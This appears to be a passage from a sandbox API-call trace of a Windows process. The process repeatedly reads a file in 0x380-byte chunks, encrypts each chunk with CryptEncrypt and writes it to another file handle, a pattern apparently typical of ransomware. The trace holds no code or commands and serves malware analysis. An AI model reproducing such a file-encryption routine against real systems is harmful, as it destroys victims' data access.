WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.098] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.098] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.098] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.098] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.098] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.098] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.098] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.098] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.098] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.098] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.098] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.098] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.098] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.098] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.098] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.099] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.099] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.099] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.099] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.099] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.099] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.099] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.099] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.099] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.099] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.099] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.099] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.099] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.100] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.100] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.100] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.100] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.100] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.100] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.100] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.100] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.100] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.100] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.100] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.100] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.100] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.100] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.101] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.101] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.101] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.101] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.101] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.101] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.101] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.101] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.101] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.101] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.101] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.101] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.101] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.101] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.101] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.102] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.102] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.102] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.102] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.102] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.102] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.102] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.102] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.102] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.102] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.102] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.102] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.102] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.103] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.103] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.103] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.103] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.103] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.103] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.103] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.103] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.103] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.103] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.103] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.103] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.103] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.103] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.104] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.104] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.104] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.104] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.104] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.104] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.104] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.104] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.104] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.104] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.104] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.104] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.104] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.104] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.104] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.105] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.105] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.105] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.105] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, 